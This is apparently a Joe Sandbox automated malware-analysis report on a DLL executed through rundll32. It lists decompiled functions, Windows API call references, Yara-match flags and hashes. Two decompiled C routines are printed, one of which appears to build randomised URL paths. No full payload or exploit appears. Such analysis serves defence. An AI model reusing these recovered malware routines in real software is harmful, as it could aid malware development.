                                • Opcode Fuzzy Hash: 217595572b4d4ceeb4615f1487ccd39067cdb50e6fc329f73fbd29ea19b8e07f
                                • Instruction Fuzzy Hash: 1B219A76500301AFEB20BB24DC48B2FB7E8AF55712F04841EF8969E280EB75D485C62A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343264F Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E0343264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03436D63(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x0343265b
                                0x0343265f
                                0x03432660
                                0x03432661
                                0x03432663
                                0x03432665
                                0x03432668
                                0x0343266d
                                0x03432704
                                0x0343270b
                                0x0343270b
                                0x03432676
                                0x0343267d
                                0x0343268d
                                0x0343268d
                                0x03432693
                                0x03432695
                                0x0343269a
                                0x034326a3
                                0x034326a9
                                0x034326ae
                                0x034326b9
                                0x034326bd
                                0x034326bf
                                0x034326c0
                                0x034326c9
                                0x034326cd
                                0x034326de
                                0x034326cf
                                0x034326d4
                                0x034326d9
                                0x034326e8
                                0x034326e8
                                0x034326bd
                                0x034326ee
                                0x034326f4
                                0x034326f4
                                0x034326fd
                                0x03432702
                                0x03432702
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 5062df437ed22e91b0aca8e3a808cb2d47876a18abb60af5129fdcea3b29572a
                                • Instruction ID: ca66858c31d91194f2d7592c7f1bfe4b4cf3c4b9440f954cb0487ed3837f9ec0
                                • Opcode Fuzzy Hash: 5062df437ed22e91b0aca8e3a808cb2d47876a18abb60af5129fdcea3b29572a
                                • Instruction Fuzzy Hash: F2213079900209FFCB11DFA8C9849DEBBB8FF49215B14456AE905EB310EB70DA45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03492968 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0349297E
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03492999
                                • GetLastError.KERNEL32 ref: 03492A07
                                • GetLastError.KERNEL32 ref: 03492A16
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalErrorLastSection$EnterLeave
                                • String ID:
                                • API String ID: 2124651672-0
                                • Opcode ID: 2cbe69f47707856052ab7b0b33b8a69bb26c9d7c97662c96aaf282e377ff122c
                                • Instruction ID: 4525b0420c5d3c7c24c39d98d0f39bfbe992d6366dd38ece115c96703596dae5
                                • Opcode Fuzzy Hash: 2cbe69f47707856052ab7b0b33b8a69bb26c9d7c97662c96aaf282e377ff122c
                                • Instruction Fuzzy Hash: A5214836900208EFDF22DF94D904A9EBBB8FF09720F15455BF816AA210C774EA119B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03472F91 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 03472FB3
                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 03472FF7
                                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0347303A
                                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0347305D
                                  • Part of subcall function 0348B9E9: GetTickCount.KERNEL32 ref: 0348B9F9
                                  • Part of subcall function 0348B9E9: CreateFileW.KERNEL32(03480971,80000000,00000003,0349A1E8,00000003,00000000,00000000,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA16
                                  • Part of subcall function 0348B9E9: GetFileSize.KERNEL32(03480971,00000000,?,00000001,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA49
                                  • Part of subcall function 0348B9E9: CreateFileMappingA.KERNEL32(03480971,0349A1E8,00000002,00000000,00000000,03480971), ref: 0348BA5D
                                  • Part of subcall function 0348B9E9: lstrlen.KERNEL32(03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA79
                                  • Part of subcall function 0348B9E9: lstrcpy.KERNEL32(?,03480971), ref: 0348BA89
                                  • Part of subcall function 0348B9E9: HeapFree.KERNEL32(00000000,03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BAA4
                                  • Part of subcall function 0348B9E9: CloseHandle.KERNEL32(03480971,?,00000001,?,03480971), ref: 0348BAB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                • String ID:
                                • API String ID: 3239194699-0
                                • Opcode ID: d98abf3b137b53a3381fbb12bf5c1043b265d7a0655161ccca499341bf62c8a9
                                • Instruction ID: 4d51432640863ea4ac924daa228272e4fb064c64ebc1da5131c7fd780c69b346
                                • Opcode Fuzzy Hash: d98abf3b137b53a3381fbb12bf5c1043b265d7a0655161ccca499341bf62c8a9
                                • Instruction Fuzzy Hash: E9217C35900248DFDF21EF66DC44EEEBBB8EF45350F28012AF925AA2A4D7318509DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03477D47 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03477D99
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0347C556,?), ref: 03477DAB
                                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0347C556,?), ref: 03477DC3
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,0347C556,?), ref: 03477DDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleModuleNamePointerRead
                                • String ID:
                                • API String ID: 1352878660-0
                                • Opcode ID: decd6f42da852db4b5df6e388a26ebc6809e78419b5f54e57d975fb1a5554084
                                • Instruction ID: 63adb03355e52fd1e306964eb8447eb93b1783b3326847594908f8c844ebe6a5
                                • Opcode Fuzzy Hash: decd6f42da852db4b5df6e388a26ebc6809e78419b5f54e57d975fb1a5554084
                                • Instruction Fuzzy Hash: 42115E71A01218BBDB22EB65CC88EFFBEACEF02654F144057F505E9154D3718A50CAA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A253 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?), ref: 0347A28B
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347A2A2
                                • StrChrA.SHLWAPI(00000000,0000002E), ref: 0347A2AB
                                • GetModuleHandleA.KERNEL32(00000000), ref: 0347A2C9
                                  • Part of subcall function 03478C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 03478D0D
                                  • Part of subcall function 03478C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61), ref: 03478D28
                                  • Part of subcall function 03478C35: RtlEnterCriticalSection.NTDLL(0349A400), ref: 03478D4D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                • String ID:
                                • API String ID: 105881616-0
                                • Opcode ID: 0fd3533283d8e52960cded12fd39b7b2c0eb7326ca887642e67283cb3cf6d39e
                                • Instruction ID: 4fa3d01a00ed2fe66c811ae6dff95b6fa5621993760d8f6119366e39e0547dde
                                • Opcode Fuzzy Hash: 0fd3533283d8e52960cded12fd39b7b2c0eb7326ca887642e67283cb3cf6d39e
                                • Instruction Fuzzy Hash: E7213934A00209EFDB11DFA9C948AAEBBF9EF45300F14855AE806AF350DB70D981CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491C9B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,034766C0,?,00000000,?), ref: 03491CAB
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,034766C0,?,00000000,?), ref: 03491CCD
                                • lstrcpyW.KERNEL32(00000000,?), ref: 03491CF9
                                • lstrcatW.KERNEL32(00000000,?), ref: 03491D0C
                                  • Part of subcall function 0347B83F: strstr.NTDLL ref: 0347B917
                                  • Part of subcall function 0347B83F: strstr.NTDLL ref: 0347B96A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 3712611166-0
                                • Opcode ID: 73fce084c9722be2cce2dffe23371e58d30515ee3eaf3d8171649882f568d77d
                                • Instruction ID: b5f2d21a1c768374468a03a0433119861466863013c78dbf50047bc77448fbbb
                                • Opcode Fuzzy Hash: 73fce084c9722be2cce2dffe23371e58d30515ee3eaf3d8171649882f568d77d
                                • Instruction Fuzzy Hash: 1811567650011ABFEF11AFA2CC88CDF7FACEF09264B10456AF904AE110D734EA418BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491D47 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03491D62
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03491D86
                                • RegCloseKey.ADVAPI32(?), ref: 03491DDE
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 03491DAF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: QueryValue$AllocateCloseHeapOpen
                                • String ID:
                                • API String ID: 453107315-0
                                • Opcode ID: aa289295fcbe106e4476ff0cf1198dc8ebeadfcbeb1e374ab1a5dad28822ad75
                                • Instruction ID: 56340dfd16042465d78e2f92fe37234b313a397cfc73162322477a8058af987b
                                • Opcode Fuzzy Hash: aa289295fcbe106e4476ff0cf1198dc8ebeadfcbeb1e374ab1a5dad28822ad75
                                • Instruction Fuzzy Hash: E621EAB990010DFFEF11EF95C8848EEBFBDEB48250F24855BE801AB214E771AA51DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347263B Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0348EAA8,00000000,?,00000000,0347E842,00000000,0616C310), ref: 03472646
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347265E
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0348EAA8,00000000,?,00000000,0347E842,00000000,0616C310), ref: 034726A2
                                • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 034726C3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: e2329b2c990f1224a61199d0e835e83c40a7463db8d25ac51fdc01cdd5aefe6f
                                • Instruction ID: c232d5c76acc950b4c0a95a1949630678d7de217f072544cf897b6453c834a27
                                • Opcode Fuzzy Hash: e2329b2c990f1224a61199d0e835e83c40a7463db8d25ac51fdc01cdd5aefe6f
                                • Instruction Fuzzy Hash: 82110672A00214AFC710DF6ADC84E9FBBEEDB92250B190177E404EF251E6709E0487A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434162 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E03434162(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x343a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x343a2f0; // 0xd600d5cd
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x343a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x0343416a
                                0x0343416d
                                0x03434173
                                0x0343418b
                                0x0343418d
                                0x03434192
                                0x03434194
                                0x03434197
                                0x03434199
                                0x0343419c
                                0x0343419e
                                0x0343419e
                                0x034341a0
                                0x034341ab
                                0x034341b0
                                0x034341c1
                                0x034341c9
                                0x034341ce
                                0x034341d1
                                0x034341d4
                                0x034341d6
                                0x034341d9
                                0x034341dc
                                0x034341dc
                                0x034341df
                                0x034341ea
                                0x034341ef
                                0x034341f9

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03431DC6,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 0343416D
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03434185
                                • memcpy.NTDLL(00000000,055E95B0,-00000008,?,?,?,03431DC6,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 034341C9
                                • memcpy.NTDLL(00000001,055E95B0,00000001,034358D7,00000000,055E95B0), ref: 034341EA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: d193ce997812913dd48f6f0f5e9edf8b4608ac0bff07c0e7a5c5667028831aa2
                                • Instruction ID: 7bd09b410c9e62d058c1721e0ca092e2851a77e15da340a9232b9f6b1d7ca1b4
                                • Opcode Fuzzy Hash: d193ce997812913dd48f6f0f5e9edf8b4608ac0bff07c0e7a5c5667028831aa2
                                • Instruction Fuzzy Hash: D411E776A00215BFC710DB6ADC88D9ABFFAEB95261B090166E544DB340E7719A0486A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034821FE Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalFix.KERNEL32(00000000), ref: 0348223E
                                • memset.NTDLL ref: 03482252
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0348225F
                                  • Part of subcall function 0348C563: OpenProcess.KERNEL32(00000410,B8F475FF,03482289,00000000,00000000,03482289,0000001C,00000000,00000000,?,?,?,03482289), ref: 0348C5BD
                                  • Part of subcall function 0348C563: CloseHandle.KERNEL32(00000000,00000000,00000000,03482299,00000104,?,?,?,03482289), ref: 0348C5DB
                                  • Part of subcall function 0348C563: GetSystemTimeAsFileTime.KERNEL32(03482289), ref: 0348C643
                                • GlobalUnWire.KERNEL32(00000000), ref: 0348228A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                • String ID:
                                • API String ID: 3286078456-0
                                • Opcode ID: 4a0f037cf738fc0048f7c182cdc42ccf8afd0b596cbf965a0d08f20124283e03
                                • Instruction ID: 5692ef25b56f9cc0db67ba1020fedf9fd697fe0d7d9e8526422089b2351ebc45
                                • Opcode Fuzzy Hash: 4a0f037cf738fc0048f7c182cdc42ccf8afd0b596cbf965a0d08f20124283e03
                                • Instruction Fuzzy Hash: A8117075D00319ABDB12FBB5E889B9EBBF8AB18601F04421BE905FA384DB7585008B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491C1F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0347AE46,00000000,00000000), ref: 03491C3D
                                • GetLastError.KERNEL32(?,?,?,0347AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0347EBC1,?,0000001E), ref: 03491C45
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide
                                • String ID:
                                • API String ID: 203985260-0
                                • Opcode ID: a307d94d8a8194596801a85c1488e4bb5f1ae03c9ac4e1710fe2b0f648c09da8
                                • Instruction ID: cbc2fba873ddd25423ea4b85a0270ef75c25a2afa25260b783016beaca8af1d5
                                • Opcode Fuzzy Hash: a307d94d8a8194596801a85c1488e4bb5f1ae03c9ac4e1710fe2b0f648c09da8
                                • Instruction Fuzzy Hash: 270188355083527F9B21EB769C4DC6BBFACEBC6770B200A5FF8659A280D7205805C675
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034727E0 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?,?,00000000,?,?,03471D09,?,?,?,?,?,?,?,?,?), ref: 034727F4
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • mbstowcs.NTDLL ref: 0347280E
                                • lstrlen.KERNEL32(?), ref: 03472819
                                • mbstowcs.NTDLL ref: 03472833
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                • String ID:
                                • API String ID: 1961997177-0
                                • Opcode ID: 3fa1de9f71c28c254a356a983a0ff912e0d44c27eed82628877478990f6fda4f
                                • Instruction ID: e17c0d3526c45a3bb1ff1e56b377b7a4c8b7f47988a167ae9a6717854ee2861d
                                • Opcode Fuzzy Hash: 3fa1de9f71c28c254a356a983a0ff912e0d44c27eed82628877478990f6fda4f
                                • Instruction Fuzzy Hash: 81019277900305BBDB11FBA68C85FCF7BACDB84650F14452BB505AF100EAB5D90086A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03471B71 Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?), ref: 03471B7E
                                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 03471BA4
                                • lstrcpy.KERNEL32(00000014,?), ref: 03471BC9
                                • memcpy.NTDLL(?,?,?), ref: 03471BD6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 1388643974-0
                                • Opcode ID: e155acc7433fd0fa5996e68847deb51dc0055a4021fc18fce63b20c189c8c935
                                • Instruction ID: 841f6d3e7b19ec9032be2821dfc6d2e16b27fabad567c88906dd6e99f730e014
                                • Opcode Fuzzy Hash: e155acc7433fd0fa5996e68847deb51dc0055a4021fc18fce63b20c189c8c935
                                • Instruction Fuzzy Hash: C011497150020AEFC721DF58D844E9ABBF8FF49704F15855AF8599B211D771E904CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E03B Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03480D10,?,00000000,00000000), ref: 0348E04E
                                • lstrlen.KERNEL32(0616C178,?,03480D10,?,00000000,00000000), ref: 0348E06F
                                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0348E087
                                • lstrcpy.KERNEL32(00000000,0616C178), ref: 0348E099
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                • String ID:
                                • API String ID: 1929783139-0
                                • Opcode ID: 8c3049036701cc5954f299d4a00caf72686b622c952cb3a28060c193955f1e62
                                • Instruction ID: db50da8e8a1cf53013592804087931e3cea471b262786698a02d756df468bd95
                                • Opcode Fuzzy Hash: 8c3049036701cc5954f299d4a00caf72686b622c952cb3a28060c193955f1e62
                                • Instruction Fuzzy Hash: F2010876900204EFC711EFA99844A5FBBFCAB5A200F15046AE906EB305D630C5448BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485261 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • RtlInitializeCriticalSection.NTDLL(0349A400), ref: 03485285
                                • RtlInitializeCriticalSection.NTDLL(0349A3E0), ref: 0348529B
                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852AC
                                • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852E0
                                  • Part of subcall function 034868AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,034852C3), ref: 034868C4
                                  • Part of subcall function 034868AC: LoadLibraryA.KERNEL32(?), ref: 03486965
                                  • Part of subcall function 034868AC: FreeLibrary.KERNEL32(00000000), ref: 03486970
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                • String ID:
                                • API String ID: 1711133254-0
                                • Opcode ID: 6e162c173dd5371a011c777b906b1a7f9a685c3b8528f3a7df041e53fbdb8e18
                                • Instruction ID: 86867198558464a1636ad6073a9d43395f1542c0db697b96a93e543718bf6567
                                • Opcode Fuzzy Hash: 6e162c173dd5371a011c777b906b1a7f9a685c3b8528f3a7df041e53fbdb8e18
                                • Instruction Fuzzy Hash: ED119275E803149FEB20FFADE989A097BE4F7AA210711056FE911EF348D7B448418F88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03489E10 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0347B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 03489E17
                                • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 03489E2F
                                • memcpy.NTDLL(0000000C,?,00000001), ref: 03489E45
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0616C304,00000000,?,03476584,?), ref: 0347A90E
